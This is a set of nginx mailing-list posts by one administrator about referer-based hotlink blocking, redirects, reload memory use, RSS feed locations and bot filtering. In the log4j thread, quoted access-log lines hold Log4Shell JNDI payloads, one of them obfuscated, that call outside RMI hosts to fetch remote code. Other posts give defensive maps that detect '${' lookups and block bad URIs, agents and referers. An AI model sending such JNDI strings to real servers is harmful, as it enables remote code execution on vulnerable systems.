Question regarding $invalid_referer

2024-03-05 Thread li...@lazygranch.com
I am presently using a scheme like this to prevent scraping of documents.

   location /images/ {
       valid_referers none blocked www.example.com example.com forums.othersite.com;
       # you can tell the browser that it can only download content from
       # the domains you explicitly allow
       #if ($invalid_referer) {
       #    return 403;
       #}
       if ($invalid_referer) {
           return 302 $scheme://www.example.com;
       }
   }
***
I commented out some old code which just sends an error message. I
pulled that from the nginx website. I later added the code which sends
the user to the top level of the website. 

It works, but the result really isn't user friendly. What I'd rather
do, when I find an invalid referer on a request for a document, is
redirect the request to the HTML page that has my link to the document.

I am relatively sure I will need to hand-code the redirection for every
file, but I plan on only doing this for PDFs. Probably 20 files.

Here is a Google referral I pulled from the log file:

*
302 172.0.0.0 - - [05/Mar/2024:20:18:52 +] "GET /images/ttr/0701crash.pdf HTTP/2.0" 145 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36" "-"
**
So I would need to map /images/ttr/0701crash.pdf to the referring page
on the website.
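One way to sketch this for a couple of dozen files is a map from each
protected PDF URI to the page that links to it, then use the mapped
value in the redirect. The .html paths below are hypothetical; the
default entry keeps the current behavior of sending everyone else to
the top level:

```nginx
# in the http block: map each protected PDF to the page that links it
map $request_uri $doc_page {
    default                    /;                   # fall back to top level
    /images/ttr/0701crash.pdf  /ttr/0701crash.html; # hypothetical page path
}

# in the server block
location /images/ {
    valid_referers none blocked www.example.com example.com forums.othersite.com;
    if ($invalid_referer) {
        return 302 $scheme://www.example.com$doc_page;
    }
}
```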
___
nginx mailing list
nginx@nginx.org
https://mailman.nginx.org/mailman/listinfo/nginx


Re: nginx redirects all requests to root

2022-06-20 Thread li...@lazygranch.com



On Mon, 20 Jun 2022 17:23:23 -0400
"_lukman_"  wrote:

> server
> {
>listen 443 default_server ssl;
>listen [::]:443 ssl http2;
>server_name dummysite.io www.dummysite.io;
>ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; #
> managed by Certbot
>ssl_certificate_key
> /etc/letsencrypt/live/dummysite.io/privkey.pem; # managed by Certbot
>location /
>{
>   root
> /home/ubuntu/dummysite-ui/_work/dummysiteWebV1/dummysiteWebV1/build/web/;
>   index index.html index.php;
>   # try_files $uri /index.html index.php;
>}

The mail wrapping makes this kind of confusing. In my own conf file
the root directive is not within the location block. I believe this is
what you want:

server {
    listen 443 default_server ssl;
    listen [::]:443 ssl http2;
    server_name dummysite.io www.dummysite.io;
    ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/dummysite.io/privkey.pem; # managed by Certbot
    root /home/ubuntu/dummysite-ui/_work/dummysiteWebV1/dummysiteWebV1/build/web/;
    location / {
        index index.html index.php;
        # try_files $uri /index.html index.php;
    }
}

I put my webroot in /usr/share/nginx/html/website1

I have this line after the server_name:
ssl_dhparam /etc/ssl/certs/dhparam.pem;

Hopefully this works. If not, wait for the gurus.






___
nginx mailing list -- nginx@nginx.org
To unsubscribe send an email to nginx-le...@nginx.org


Re: 200 html return to log4j exploit

2021-12-20 Thread li...@lazygranch.com



On Mon, 20 Dec 2021 17:49:48 +
Jay Caines-Gooby  wrote:

> The request is for your index page "GET / HTTP/1.1"; that's why your
> server responded with 200 OK. The special characters are in the
> referer and user-agent fields, as a log4j system would also try to
> interpolate these, and thus be vulnerable to the exploit.
> 
> On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com
>  wrote:
> 
> > I don't have any service using Java, so I don't believe I am subject
> > to this exploit. However, I am confused why it returned a 200 for
> > this request. The special characters in the URL are confusing.
> >
> > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET /
> > HTTP/1.1" 706
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}"
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"
> >
> > log_format  main  '$status $remote_addr - $remote_user
> > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> >   '"$http_user_agent" "$http_x_forwarded_for"';
> >
> > That is my log format from the nginx.conf.
> >
> > I now have a map to catch "jndi" in both url and agent. So far so
> > good not that it matters much. I just like to gather IP addresses
> > from hackers and block their host if it lacks eyeballs,


Thanks for both replies. Note that the hackers have worked around my
simple "map" detection; matching jndi is not sufficient. Examples:

103.107.245.1 - - [20/Dec/2021:14:38:15 +] "GET / HTTP/1.1" 706 
"${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" 
"${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"

103.107.245.1 - - [20/Dec/2021:14:38:16 +] "GET 
/?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A
1389%2FBinary%7D HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" 
"${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"
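Since the attackers obfuscate the jndi string itself, a broader (if
blunter) approach is to match the ${ substitution syntax, which should
never appear in a legitimate referer, agent, or URI. A sketch,
combining the three fields into one map source (needs a reasonably
recent nginx); the PCRE hex escapes avoid nginx's own $ parsing:

```nginx
# in the http block: flag log4j-style ${...} lookups anywhere
map "$http_user_agent $http_referer $request_uri" $log4j_probe {
    default       0;
    "~\x24\x7B"   1;   # literal ${  (\x24 = $, \x7B = {)
    "~%24%7B"     1;   # URL-encoded ${ in the request URI
}
```

and then in the server block: if ($log4j_probe) { return 444; }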

I can't really tell if this Indonesian IP address is an ISP or not, so
I guess I will let it slide at the firewall. The other IP belongs to
Digital Ocean. I have some droplets there, and yes, there are bad
actors on the service. It is kind of sad that I have to block the
vendor I use, but AWS, Linode, etc. are probably just as bad. At the
price of the service you simply can't police it at scale.

Probably another stupid question, but what is up with this ${ stuff? I
need some terminology to google so I can read up on it.


200 html return to log4j exploit

2021-12-19 Thread li...@lazygranch.com
I don't have any service using Java, so I don't believe I am subject to
this exploit. However, I am confused why it returned a 200 for this
request. The special characters in the URL are confusing.

200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706 
"${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" 
"${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"

log_format  main  '$status $remote_addr - $remote_user
[$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';

That is my log format from the nginx.conf. 

I now have a map to catch "jndi" in both URL and agent. So far so good,
not that it matters much. I just like to gather IP addresses from
hackers and block their host if it lacks eyeballs.


Re: Nginx not responding to port 80 on public IP address

2021-02-04 Thread li...@lazygranch.com
I insist on encryption so this is what I use:

server {
listen 80;
server_name yourdomain.com  www.yourdomain.com ;
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
 }
return 301 https://$host$request_uri;
}

I only serve static pages, so I use that request-method filter;
obviously it is optional. But basically every unencrypted request to
port 80 is redirected to an encrypted request on 443.
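For completeness, the 443 side that the redirect lands on looks
something like this; the certificate paths and webroot here are
placeholders:

```nginx
server {
    listen 443 ssl http2;
    server_name yourdomain.com www.yourdomain.com;
    ssl_certificate     /etc/letsencrypt/live/yourdomain.com/fullchain.pem;  # placeholder
    ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;    # placeholder
    root /usr/share/nginx/html/yourdomain;

    # same GET/HEAD-only filter as on port 80
    if ($request_method !~ ^(GET|HEAD)$ ) {
        return 444;
    }
}
```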

On Thu, 4 Feb 2021 07:40:35 +
Adam  wrote:

> Hi all,
> 
> nginx is running and listening on port 80:
> tcp0  0 0.0.0.0:80  0.0.0.0:*
> LISTEN  0  42297  3576/nginx: master
> tcp6   0  0 :::80   :::*
>  LISTEN  0  42298  3576/nginx: master
> 
> The server responds fine to requests on port 443, serving traffic
> exactly as expected:
> tcp0  0 0.0.0.0:443 0.0.0.0:*
> LISTEN  0  42299  3576/nginx: master
> 
> However, it will not respond to traffic on port 80. I have included
> this line in my server block to listen to port 80:
> listen 80 default_server;
> listen [::]:80 default_server;
> 
> My full config can be seen at https://pastebin.com/VzY4mJpt
> 
> I have been testing by sshing to an external machine and trying telnet
> my.host.name 80 - which times out, compared to telnet my.host.name
> 443, which connects immediately.
> 
> The port is open on my router to allow port 80 traffic. This machine
> is hosted on my home network, serving personal traffic (services
> which I use, but not for general internet use). It does respond to
> port 80 internally, if I use the internal ip address
> (http://192.168.178.43).
> 
> I've kind of run out of ideas, so thought I would post here.
> 
> Thanks in advance for any support.
> 
> Adam



Re: Prevent direct access to files but allow download from site

2020-03-11 Thread li...@lazygranch.com
Answers intermixed below.

On Wed, 11 Mar 2020 21:23:15 -0400
"MAXMAXarena"  wrote:

> Hello @Ralph Seichter,
> what do you mean by "mutually exclusive"?
> As for the tools I mentioned, it was just an example.
> Are you telling me I can't solve this problem?
> 
> 
> Hello @garic,
> thanks for this answer, it made me understand some things. But I
> don't think I understand everything you suggest to me.
> 
> Are you suggesting me how to make the link uncrawlable, but how to
> block direct access?

If you are going to block access to a file, you should protect it from
everyone, from (shall we say) the less sophisticated user right down to
the unrelenting, robots.txt-ignoring crawler.

Most webmasters want to be crawled, so they have posted about what
stops the crawlers from reaching files. Things like Ajax used to be a
problem; over the years the crawlers have become smarter. You can
search blogs for crawling problems and then do just the opposite of
their suggestions. That is, make your file hard to reach.

In other words, this is a research project.

> 
> For example, if the user downloads the file, then goes to the download
> history, sees the url, copies it and re-downloads the file. How can I
> prevent this from happening?
> 
> Maybe you've already given me the solution, but not being an expert,
> i need more details if it's not a problem, thanks.
> 

In the http block, "include" these files which contain maps. You will
have to create these files.
-
include /etc/nginx/mapbadagentlarge ;
include /etc/nginx/mapbadrefer  ;
include /etc/nginx/mapbaduri;
-

Here is how I use maps. First in the location at the webroot:
---

location / {
index  index.html index.htm;
if ($bad_uri)  { return 444; }
if ($badagent) { return 403; }
if ($bad_referer)  { return 403; }
---

403 is forbidden, but really that is "found and forbidden". 444 is no
reply. Technically every internet request deserves an answer, but if
they are wget-ing or whatever, I hereby grant permission to 444 them
(no answer) if you want.

A sample mapbaduri file follows. Basically, place in this file any word
you find inappropriate to appear in a URL. You need to use caution
that the words you put in here are not contained in a legitimate URL.
Incidentally, these samples are real life.
-
map $request_uri $bad_uri {
default0;
~*simpleboot   1;
~*bitcoin  1;
~*wallet   1;
}
-

Next up, and more relevant to your question, is my mapbadagentlarge
file. This is where you trap curl and wget. There are many lists of bad
agents online. The "" entry seems to trap requests with no agent.
-
map $http_user_agent $badagent {
default0;
"" 1;
~*SpiderLing   1;
~*apitool  1;
~*pagefreezer  1;
~*curl 1;
~*360Spider1;
}

--

The mapbadrefer is up to you. If you find a website you don't want
linking to your website, you make a file as follows:

map $http_referer $bad_referer {
default0;
"~articlevault.info"   1;
"~picooly.pw"  1;
"~pictylox.pw"  1;
"~imageri.pw"  1;
"~mimgolo.pw"  1;
"~rightimage.co"   1;
"~pagefreezer.com" 1;
}
---

Note that as you block these websites you will probably lose Google
rank.


> I found this stackoverflow topic that is interesting:
> https://stackoverflow.com/questions/9756837/prevent-html5-video-from-being-downloaded-right-click-saved
> 
> Read the @Tzshand answer modified by @Timo Schwarzer with 28 positive
> votes, basically it's what I would like to do, but in my case they
> are pdf files and I use Nginx not Apache.
> 

Right click trapping is pretty old school. If you do trap right clicks,
you should provide a means to save desired links using a left click. I
don't know how to do that but I'm sure the code exists.  

Don't forget the dynamic URL. That prevents the URL from being reused
outside of the session. I've been on the receiving end of those
dynamic URLs but never found the need to write one, so that will be a
research project for you.
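nginx can do a version of the dynamic URL natively with its secure_link
module, where the link carries an MD5 hash and an expiry timestamp, so
a copied URL stops working once the window passes. A sketch, assuming
the module is compiled in and "mysecret" stands in for your own shared
secret:

```nginx
location /downloads/ {
    secure_link     $arg_md5,$arg_expires;
    secure_link_md5 "$secure_link_expires$uri mysecret";

    if ($secure_link = "")  { return 403; }  # missing or bad hash
    if ($secure_link = "0") { return 410; }  # link has expired
}
```

The page that hands out the link has to compute the matching md5 and
expires query arguments server-side using the same secret.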

I'm in the camp that you can probably never perfectly make a file a
secret and yet serve it, but you can block many users. It is like you
can block the script kiddie, but a nation state will get you. 

> Posted at Nginx 

Re: Possible memory leak?

2019-03-08 Thread li...@lazygranch.com
On Fri, 08 Mar 2019 10:42:28 -0500
"wkbrad"  wrote:

> Thanks for that info.  It's definitely harder to notice the issue on
> small servers like that.  But you are still seeing about a 50%
> increase in ram usage there by your own tests.
> 
> The smallest server I've tested this on uses about 20M during the
> first start and about 50M after a reload is completely finished.
> 
> Not so much of a problem for small servers but definitely a big
> problem for large ones.  That said the issue is still there on small
> servers like you've just seen.
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,283216,283318#msg-283318
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

Actually the total RAM went down after a reload for my ps_mem in the
previous email. I repeated the test just using free, which could be a
polluted test, but the RAM went down again. I also did the ps_mem test
again and total RAM was reduced.

I'm not caching in nginx, if that makes a difference.

sh-4.2# free -m
  totalusedfree  shared  buff/cache   available
Mem:   1838 276 175 10413851259
Swap: 0   0   0
sh-4.2# systemctl reload nginx
sh-4.2# free -m
  totalusedfree  shared  buff/cache   available
Mem:   1838 272 180 10413851263
Swap: 0   0   0

And repeated ps_mem test:
sh-4.2# ps_mem | grep nginx
  2.3 MiB +   3.5 MiB =   5.8 MiB   nginx (2)
sh-4.2# systemctl reload nginx
sh-4.2# ps_mem | grep nginx
  1.8 MiB +   3.1 MiB =   4.9 MiB   nginx (2)




Re: Possible memory leak?

2019-03-07 Thread li...@lazygranch.com
On Thu, 07 Mar 2019 13:33:39 -0500
"wkbrad"  wrote:

> Hi all,
> 
> I just wanted to share the details of what I've found about this
> issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some
> really great answers!
> 
> The more I look into this the more I'm convinced this is an issue
> with Nginx itself.  I've tested this with 3 different builds now and
> all have the exact same issue.
> 
> The first 2 types of servers I tested were both running Nginx 1.15.8
> on Centos 7 ( with 1 of them being on 6 ).  I tested about 10 of our
> over 100 servers.  This time I tested in a default install of Debian
> 9 with Nginix version 1.10.3 and the issue exists there too.  I just
> wanted to test on something completely different.
> 
> For the test, I created 50k very simple vhosts which used about 1G of
> RAM. Here is the ps_mem output.
>  94.3 MiB +   1.0 GiB =   1.1 GiB nginx (3)
> 
> After a normal reload it then uses 2x the ram:
> 186.3 MiB +   1.9 GiB =   2.1 GiB nginx (3)
> 
> And if I reload it again it briefly jumps up to about 4G during the
> reload and then goes back down to 2G.
> 
> If I instead use the "upgrade" option.  In the case of Debian,
> service nginx upgrade, then it reloads gracefully and goes back to
> using 1G again. 100.8 MiB +   1.0 GiB =   1.1 GiB nginx (3)
> 
> The difference between the "reload" and "upgrade" process is
> basically only that reload sends a HUP signal to Nginx and upgrade
> sends a USR2 and then QUIT signal.  What happens with all of those
> signals is entirely up to Nginx.  It could even ignore them if chose
> too.
> 
> Additionally, I ran the same test with Apache.  Not because I want to
> compare Nginx to Apache, they are different for a reason.  I just
> wanted to test if this was a system issue.  So I did the same thing
> on Debian 9, installed Apache and created 50k simple vhosts.  It used
> about 800M of ram and reloading did not cause that to increase at all.
> 
> All of that leads me to these questions.
> 
> Why would anyone want to use the normal reload process to reload the
> Nginx configuration?
> Shouldn't we always be using the upgrade process instead?
> Are there any downsides to doing that?
> Has anyone else noticed these issues and have you found another fix?
> 
> Look forward to hearing back and thanks in advance!
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,283216,283309#msg-283309
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx



Well for what it's worth, here is my result.
centos 7 3.10.0-957.5.1.el7.x86_64 #1 SMP Fri Feb 1 14:54:57 UTC 2019
x86_64 x86_64 x86_64 GNU/Linux

sh-4.2# nginx -v
nginx version: nginx/1.14.0


sh-4.2# ps_mem | grep nginx
  4.7 MiB +   2.1 MiB =   6.7 MiB   nginx (2)
sh-4.2# systemctl reload nginx
sh-4.2# ps_mem | grep nginx
  1.7 MiB +   4.0 MiB =   5.7 MiB   nginx (2)
sh-4.2# systemctl restart nginx
sh-4.2# ps_mem | grep nginx
804.0 KiB +   3.5 MiB =   4.2 MiB   nginx (2)
sh-4.2# ps_mem | grep nginx
  2.9 MiB +   2.9 MiB =   5.8 MiB   nginx (2)
sh-4.2# ps_mem | grep nginx
  2.9 MiB +   2.9 MiB =   5.8 MiB   nginx (2)


Re: I need my “bad user agent” map not to block my rss xml file

2019-01-10 Thread li...@lazygranch.com
On Thu, 10 Jan 2019 08:50:33 +
Francis Daly  wrote:

> On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote:
> 
> Hi there,
> 
> >  location / {
> >  if ($badagent) { return 403; }
> >  }
> >  location = /feeds {
> >  try_files $uri $uri.xml $uri/ ;
> > }  
> 
> >  The "=" should force an exact match, but the badagent map is
> >  checked.  
> > 
> > Absolutely the badagent check under location / is being triggered.
> > Everything works if I comment out the check.
> > 
> > The URL to request the XML file is domain.com/feeds/file.xml .   
> 
> If the request is /feeds/file.xml, that will not exactly match
> "/feeds".
> 
>   location = /feeds/file.xml {}
> 
> should serve the file feeds/file.xml below the document root.
> 
> Or, if you want to handle all requests that start with /feeds/ in a
> similar way,
> 
>   location /feeds/ {}
> 
> or
> 
>   location ^~ /feeds/ {}
> 
> should do that. (The two are different if you have regex locations in
> the config.)
> 
>   f

There is a certain irony in that I first started out with
location /feeds/ {}
BUT I had the extra root statement. This appears to work. Thanks.

Here are a few tests:
claws rssyl plugin
200 xxx.58.22.151 - - [11/Jan/2019:03:48:25 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "libfeed 0.1" "-"

Akregator
200 xxx.58.22.151 - - [11/Jan/2019:03:50:39 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "-" "-"

liferea
200 xxx.58.22.151 - - [11/Jan/2019:03:51:40 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "Liferea/1.10.19 (Linux; en_US.UTF-8; 
http://liferea.sf.net/) AppleWebKit (KHTML, like Gecko)" "-"

read on android
304 myvpnip - - [11/Jan/2019:03:55:44 +] "GET /feeds/feed.xml HTTP/1.1" 0 
"-" "Mozilla/5.0 (Linux; Android 8.1.0; myphone) AppleWebKit/537.36 (KHTML, 
like Gecko) Version/4.0 Chrome/71.0.3578.99 Mobile Safari/537.36" "-"

feedbucket (a web based reader) They use a proxy
200 162.246.57.122 - - [11/Jan/2019:04:01:06 +] "GET /feeds/feed.xml 
HTTP/1.1" 3614 "-" "FeedBucket/1.0 \x5C(+http://www.feedbucket.com\x5C)" "-"

 


Re: I need my “bad user agent” map not to block my rss xml file

2019-01-09 Thread li...@lazygranch.com
On Wed, 9 Jan 2019 08:20:05 +
Francis Daly  wrote:

> On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote:
> 
> Hi there,
> 
> > Stripping down the nginx.conf file:
> > 
> > server{
> > location / {
> >  root   /usr/share/nginx/html/mydomain/public_html;
> > if ($badagent) { return 403; }
> > }
> > location = /feeds {
> > try_files $uri $uri.xml $uri/ ;
> >}
> > }
> > The "=" should force an exact match, but the badagent map is
> > checked.  
> 
> What file on your filesystem is your rss xml file?
> 
> Is it something other than /usr/local/nginx/html/feeds or
> /usr/local/nginx/html/feeds.xml?
> 
> And what request do you make to fetch your rss xml file?
> 
> Do things change if you move the "root" directive out of the
> "location" block so that it is directly in the "server" block?
> 
>   f

Good catch on the root declaration. Actually I declared it twice. Once
under server and once under location. I got rid of the declaration
under location since that is the wrong place.

So it is now:
server {
    root /usr/share/nginx/html/mydomain/public_html;
    location / {
        if ($badagent) { return 403; }
    }
    location = /feeds {
        try_files $uri $uri.xml $uri/;
    }
}

 The "=" should force an exact match, but the badagent map is
 checked.  

Absolutely the badagent check under location / is being triggered.
Everything works if I comment out the check.

The URL to request the XML file is domain.com/feeds/file.xml . 
It is located in /usr/share/nginx/html/mydomain/public_html/feeds .

Here is the access.log file. First line is with the badagent check
skipped. Second line is with it enable.
200 xxx.58.22.151 - - [10/Jan/2019:02:07:42 +] "GET /feeds/file.xml 
HTTP/1.1" 3614 "-" "-" "-"
403 xxx.58.22.151 - - [10/Jan/2019:02:08:38 +] "GET /feeds/file.xml 
HTTP/1.1" 169 "-" "-" "-"
I'm using the RSS reader Akregator in this case. Some readers work fine
since they act more like browsers.





Need logic to not check for bad user agent if xml file

2018-12-20 Thread li...@lazygranch.com
I have a map to check for bad user agents called badagent. I want to
set up a RSS feed. The feedreaders can have funny agents, so I need to
omit the bad agent check if the file is any xml type. 

This is rejected.

if (($request_uri != [*.xml]) && ($badagent)) {return 444; }

Suggestions?

I can put the xml files in a separate location if that helps.
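One way that avoids the if logic entirely is to give the XML feeds
their own prefix location, so feed requests never reach the bad-agent
check at all; a sketch (the /feeds/ path is an assumption):

```nginx
# feed readers bypass the agent check entirely;
# ^~ makes this prefix win over any regex locations
location ^~ /feeds/ {
}

location / {
    if ($badagent) { return 444; }
}
```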


Dynamic modules versus build from scratch

2018-05-16 Thread li...@lazygranch.com
The CentOS nginx from the repo lacks ngx_http_hls_module. This is a
technique to add the module without rebuilding nginx itself:
https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7

Does anyone have experience with this? I'd like to avoid building nginx
from scratch to make updates go faster. When I ran FreeBSD, I built
nginx, so that isn't the problem. Rather, I want to stay as "native" to
CentOS as possible.


Re: Aborting malicious requests

2018-03-20 Thread li...@lazygranch.com
On Tue, 20 Mar 2018 13:03:09 +
"Friscia, Michael"  wrote:

> This is great, thank you again, this is a huge jumpstart!

Per NIST best practices, you should limit the HTTP verbs that you
allow. A very simple website can run on just GET and HEAD. Here is how
you return 444 to clients trying, for example, to POST to your website.
In this case, only GET and HEAD are allowed.

if ($request_method !~ ^(GET|HEAD)$ ) {
    return 444;
}

You might as well trap bad agents. Basically whatever isn't a browser.
I found a list on github and have been adding new ones as I get
pestered.

https://paste.fedoraproject.org/paste/FI-IRICSJy1SR5mwBZxVDQ/
I called this file mapbadagentslarge. Use the same basic scheme. This
list is overkill, but it doesn't seem to slow down nginx. What you want
to avoid are the scrapers like nutch.

if ($badagent) { return 444; }

I also block bad referrals, porn sites for instance. If a bad site
links to your site, at least you can return a 403 (not 444) and Google
won't consider the link in its algorithm. You can look at the
referring sites in an incognito browser, preferably in private. I've
clicked on the occasional odd referral only to have porn pop up on my
screen while at a coffee shop. Note that blocking referrals will lower
your Google rank.

https://paste.fedoraproject.org/paste/6ZLa10-4L9KocFNJiNG~pw/

if ($bad_referer)  { return 403; }

If you are using encryption AND if you are mapping http requests to
https, you should do these maps in both the http and https blocks. It
doesn't make sense to go through the encryption process just to tell
the IP to take a hike.

What you do with the 444 entries in the access.log is up to you. You
can do nothing and probably be fine. I have scripts to get the bad IPs
and if they have no "eyes", I block them in the firewall. Determining
if they have no eyes is time consuming. You can feed the IP to
ip2location.com. A few of the IPs assigned to data centers really go to
ISPs. ISPs have eyes, so you don't want to block them. You can get the
IP space assigned to the entity with bgp.he.net.



Re: Aborting malicious requests

2018-03-19 Thread li...@lazygranch.com
On Mon, 19 Mar 2018 12:31:20 +
"Friscia, Michael"  wrote:

> Just a thought before I start crafting one. I am creating a
> location{} block with the intention of populating it with a ton of
> requests I want to terminate immediately with a 444 response. Before
> I start, I thought I’d ask to see if anyone has a really good one I
> can use as a base.
> 
> For example, we don’t serve PHP so I’m starting with
> Location ~* .php {
> Return 444;
> }
> 
> Then I can just include this into all my server blocks so I can
> manage the aborts all in one place. This alone reduces errors in the
> logs significantly. But now I will have to start adding in all the
> wordpress stuff, then onto php myadmin, etc. I will end up with
> something like
> 
> Location ~* (.php|wp-admin|my-admin) {
> Return 444;
> }
> 
> I can imagine the chunk inside the parenthesis is going to be pretty
> huge which is why I thought I’d reach out to see if anyone has one
> already.
> 
> Thanks,
> -mike
> 

What follows is how I block requests that shouldn't be made in normal
operation. I use a similar scheme for user agents and referrals. You
should block referrals from spam/porn sites since they can trigger some
browser blocking plugins (AKA give you a bad reputation). The
procedure is similar to the 444 procedure I am about to outline, but
you should 403 them or something other than 444. Remember 444 is a
no-reply method, which is technically not kosher on the internet
(though it makes sense in this application).

Here is the procedure:

In nginx.conf in the http section, add this line:
include /etc/nginx/mapbaduri;


In the nginx.conf server section, add this line:
if ($bad_uri)  { return 444; }


This is the contents of the file mapbaduri that you need to create. It
creates $bad_uri, used in the conditional statement in nginx.conf. If
you actually use any of these resources, then obviously don't put them
in the list. You can also accidentally match patterns in legitimate
requests, so use caution. Most of these I created from actual
requests, though a few I found suggested on the interwebs.

map $request_uri $bad_uri {
default0;
/cms1;
/mscms  1;
~*\.asp  1;
~*\.cfg  1;
~*\.cgi  1;
~*\.json 1;
~*\.php  1;
~*\.ssh  1;
~*\.xml  1;
~*\.git1;
~*\.svn1;
~*\.hg 1;
~*docs 1;
~*id_dsa   1;
~*issmall  1;
~*moodletreinar   1;
~*new_gb   1;
~*tiny_mce1;
~*vendor  1;
~*web  1;
~*_backup 1;
~*_core   1;
~*_sub1;
~*authority1;
~*/jmx  1;
~*/struts   1;
~*/action   1;
~*/lib 1;
~*/career  1;
~*/market  1;
~*elfinder1   1;
~*/assets  1;
~*place1  1;
~*/backup  1;
~*zecmd   1;
~*/mysql   1;
~*/sql 1;
~*/shop1;
~*/plus1;
~*/forum1;
/engine  1;
~*license.txt  1;
~*/includes 1;
~*/sites1;
~*/plugins  1;
~*/jeecms   1;
~*gluten   1;
~*/admin1;
~*/invoker  1;
~*/blog1;
~*xmlrpc   1;
~*/wordpress1;
~*/hndUnblock.cgi   1;
~*/test/1;
~*/cgi 1;
~*/plus1;
~/wp/  1;
~/wp-admin/1;
~*/proxy1;
~*/wp-login.php1;
~*/js

Re: newbie: nginx rtmp module

2018-03-09 Thread li...@lazygranch.com
I had a few neurons fire. I forgot nginx can load dynamic modules.

https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/

I haven't done this myself, so you are on your own at this point.
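Assuming the module has been built as a dynamic module (a .so) against
the same nginx version, loading it is a single directive at the top of
nginx.conf; for the rtmp module that would look something like:

```nginx
# path is relative to the nginx prefix; the .so must be compiled
# against the exact nginx version that loads it
load_module modules/ngx_rtmp_module.so;
```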


On Fri, 09 Mar 2018 11:59:30 -0500
"neuronetv"  wrote:

> I've resigned myself to the fact that there is no rtmp module here
> which leads me to the obvious question:
> 
> is it possible to install an rtmp module into this 'yum install'
> version of nginx?
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,278950,278984#msg-278984
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx



Re: Flush access log buffer

2018-02-26 Thread li...@lazygranch.com
On Fri, 23 Feb 2018 18:54:48 -0800
"li...@lazygranch.com" <li...@lazygranch.com> wrote:

> On Thu, 22 Feb 2018 18:40:12 -0800
> "li...@lazygranch.com" <li...@lazygranch.com> wrote:
> 
> > When I was using FreeBSD, the access log was real time. Since I went
> > to Centos, that doesn't seem to be the case. Is there some way to
> > flush the buffer?
> > ___
> > nginx mailing list
> > nginx@nginx.org
> > http://mailman.nginx.org/mailman/listinfo/nginx  
> 
> I found a flush=x option on the command line. I set it for 1m for
> testing. Note that you need to specify a buffer size else nginx will
> choke.
> 
> ___

This flush=time option isn't working. I'm at a loss here. 

Here is some of a ls -l:
-rw-r- 1 nginx adm12936 Feb 27 02:17 access.log
-rw-r--r-- 1 nginx root4760 Feb 24 03:06 access.log-20180224.gz
-rw-r- 1 nginx adm  1738667 Feb 26 03:21 access.log-20180226

This is the ls -l on /var/log/nginx:
drwxr-xr-x. 2 root   root   4096 Feb 27 02:11 nginx

I'm not requesting a compressed log, so I assume CentOS is creating the
gzipped files. Usually the access.log file has content, but sometimes
it is empty and the log data is in the access.log-"date" file, which I
suspect is a rollover from access.log. That is, maybe CentOS rolls it
but doesn't zip it right away.
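My guess (unverified) is that logrotate is doing the rolling: on
CentOS the nginx package typically ships /etc/logrotate.d/nginx, which
rotates the log and sends nginx a USR1 to reopen it. Something along
these lines (details vary by package); the delaycompress option would
also explain why the rolled file isn't zipped right away:

```
# /etc/logrotate.d/nginx (typical packaged version; paths may differ)
/var/log/nginx/*.log {
    daily
    missingok
    compress
    delaycompress       # zip on the *next* rotation, not immediately
    postrotate
        /bin/kill -USR1 $(cat /run/nginx.pid 2>/dev/null) 2>/dev/null || true
    endscript
}
```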


http {
log_format  main  '$status $remote_addr - $remote_user [$time_local] 
"$request" '
  '$body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';
access_log  /var/log/nginx/access.log  main buffer=32k flush=1m;


uname -a
Linux 3.10.0-693.17.1.el7.x86_64 #1 SMP Thu Jan 25 20:13:58 UTC 2018 x86_64 
x86_64 x86_64 GNU/Linux

nginx -V
nginx version: nginx/1.12.2
built by gcc 4.8.5 20150623 (Red Hat 4.8.5-16) (GCC) 
built with OpenSSL 1.0.2k-fips  26 Jan 2017
TLS SNI support enabled
configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx
--modules-path=/usr/lib64/nginx/modules
--conf-path=/etc/nginx/nginx.conf
--error-log-path=/var/log/nginx/error.log
--http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid
--lock-path=/var/run/nginx.lock
--http-client-body-temp-path=/var/cache/nginx/client_temp
--http-proxy-temp-path=/var/cache/nginx/proxy_temp
--http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp
--http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp
